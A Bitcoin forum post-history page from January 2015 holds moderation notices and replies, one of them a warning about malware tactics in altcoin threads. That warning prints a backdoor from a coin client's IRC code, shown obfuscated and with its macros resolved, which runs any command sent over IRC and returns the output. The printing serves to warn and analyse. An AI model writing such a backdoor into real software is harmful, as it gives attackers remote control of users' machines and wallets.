Bitcoin Forum
June 26, 2024, 08:00:29 PM *
News: Latest Bitcoin Core release: 27.0 [Torrent]
 
  Home Help Search Login Register More  
  Show Posts
Pages: « 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 [35] 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 ... 258 »
681  Economy / Service Announcements / MOVED: BITCOIN Faucet list W/ a few LTC and DOGE Faucets on: January 30, 2015, 04:59:55 AM
This topic has been moved to Trashcan.

Reason: referral link
682  Economy / Currency exchange / MOVED: need $35 skrill for pm on: January 30, 2015, 04:56:26 AM
This topic has been moved to Trashcan.

Reason: not bitcoin related
683  Economy / Goods / MOVED: [WTS] Domain: www.btcfirst.org on: January 30, 2015, 04:41:54 AM
This topic has been moved to Trashcan.

Reason: duplicate topic
684  Economy / Digital goods / MOVED: [WTB] Account Windows Server [2 weeks] forPaypal on: January 28, 2015, 04:33:28 AM
This topic has been moved to Trashcan.

Reason: not bitcoin related
685  Local / Бизнес / MOVED: Переживаешь за свою анонимность в сети И on: January 27, 2015, 12:06:22 AM
This topic has been moved to Trashcan.

Reason: referral link
686  Alternate cryptocurrencies / Altcoin Discussion / Beware of Increasingly Sophisticated Malware Infection Attempts on: January 25, 2015, 10:33:22 PM
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
687  Bitcoin / Bitcoin Technical Support / Re: How to update to 0.10 via git ? on: January 25, 2015, 09:38:06 PM
Code:
git clone https://github.com/bitcoin/bitcoin.git
cd bitcoin-master
./autogen.sh
./configure
make
make install
688  Economy / Lending / MOVED: NEED 2$ PP LOAN! on: January 25, 2015, 08:50:37 PM
This topic has been moved to Trashcan.

Reason: not bitcoin related
689  Economy / Gambling / MOVED: The report of the Game in HYIP on: January 25, 2015, 05:47:29 AM
This topic has been moved to Trashcan.

Reason: referral links
690  Economy / Gambling / MOVED: Monitoring crypto HYIP on: January 25, 2015, 05:42:04 AM
This topic has been moved to Trashcan.

Reason: referral link
691  Other / Meta / Re: What is Data321? on: January 25, 2015, 05:12:25 AM
Doesn't matter if you're a non profit... I believe the rule is that you shouldn't use other people's copyrights for any commercial gain?
consider the following:
If I was running a http proxy, would it be okay to insert a banner at the top of each page (like this) to fund the server?
692  Other / Meta / Re: Why Did There Use To Be A "Chinese Students" Subforum? on: January 25, 2015, 04:57:36 AM
Nefario taught an english class in china. he had some assignment where he got his students to do something on the forum. That's all I can remember.

edit:
Sorry, mixture of slow and lazy.

3 Classes we're involved, with roughly 80 students per class.

The classes were broken into companies of their own choosing, each company needed a CEO and CFO
And that's all the rules really. The general idea being that they had to do business with foreingers for bitcoin (as at the time only Westerners had bitcoin).

When I started I did have lots of complicated rules, but that just confused everyone, so kept it really basic MUST MAKE BTC, marks given for genuine effort.

The total amount earned by all companies combined was 75btc in a period of about 1 & 1/2 months.

The largest being 31 btc by a single group.
Next being 16btc
10,8....0

There were 17 companies, only 8 of them had any bitcoin at all, the rest got nothing.

I had expected an internal market to develope where companies would specialise and people would be lent from one group to another for a price but nothing like this happened at all.

What did they do?

Apart from spamming the forum and pestering people here are some of the things that we're tried.

Translating Chinese jokes to English
Selling Mp3's and video's about Chinese culture
Making a Chinese cookbook and attempting to sell recipies.
Having a magazine about Chinese medicine
Making two homemade KungFu Movies (which were actually very good but no one bought)
Giving advice on how to enter the Chinese market, open a Chinese bank account etc.
Selling traditional Chinese Medicine advice.
Begging.

The most successful of these was translating jokes, so successful that it convered the majority of bitcoin for the first 3 groups (two of which saw how we it was working and jumped in).

Problems
Language, obviously many of the students could not write a clear advertisement to save their lives.
Understanding bitcoin
Knowing how to use a computer
Having a computer or internet access (most students dont have).
Product ideas.

In roughly the above order.

Of all the students involved about 20 really made an effort or took part. And it seems to be those from this group that are continueing to use bitcoin (after counting they asked for their bitcoin back).

In most ways I would deem this experiment something of a failure, it was poorly executed on my part, and most of my hopes (of developing an internal market inside the college based on bitcoin) came to nothing, but there were some minor success.

Most of the winning companies were in the same class, most of the failing ones were together also, it seems success and failure are contaigous.

Questions?

693  Other / Meta / Re: bot made accounts on: January 25, 2015, 12:53:49 AM
they're being handled. see: https://bitcointalk.org/modlog.php
694  Bitcoin / Bitcoin Technical Support / Re: Multiple Wallet System for Client Accounts on: January 23, 2015, 11:59:01 PM
I dont really want to have all funds put into a single wallet and just check the transactions to see how much funds a customer has.
but that is the best way and pretty much every bitcoin exchange/payment processor does that.
695  Economy / Gambling / MOVED: BTC Casino 5mBTC FREE on: January 23, 2015, 05:31:34 AM
This topic has been moved to Trashcan.

Reason: duplicate topic
696  Economy / Currency exchange / MOVED: [h] BTC/SKRILL [W] payza on: January 21, 2015, 03:20:39 AM
This topic has been moved to Trashcan.

Reason: duplicate topic
697  Other / Meta / Re: What is Data321? on: January 21, 2015, 02:25:47 AM
if you visit the site and scroll to the bottom, you'll see this:
Quote
本网站为比特币加速站点,只为方便中国用户搜索及查找相关答案,属于非营利网站,友情链接或者其他相关问题,请联系QQ:2450057300.
which translates to
Quote
This website is Bitcoin accelerate site, only for the convenience of Chinese users to search and find relevant answers, a non-profit website, links or other related issues, please contact QQ: 2450057300.

Mystery solved. all you had to do was scroll down. Kiss
698  Bitcoin / Press / MOVED: [2014-1-10] BTCFEED → Obama Voices Out On Cryptology Monitoring In Cameroon on: January 20, 2015, 04:37:58 AM
This topic has been moved to Trashcan.

Reason: not bitcoin related
699  Alternate cryptocurrencies / Announcements (Altcoins) / MOVED: Viking Coin-MANDATORY UPDATE VIK MOVEMENT [FULLY POS]!!! on: January 20, 2015, 04:31:37 AM
This topic has been moved to Trashcan.

Reason: virus
700  Economy / Digital goods / MOVED: WTB Gift Cards on: January 20, 2015, 04:27:17 AM
This topic has been moved to Trashcan.

Reason: not bitcoin related
Pages: « 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 [35] 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 ... 258 »
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!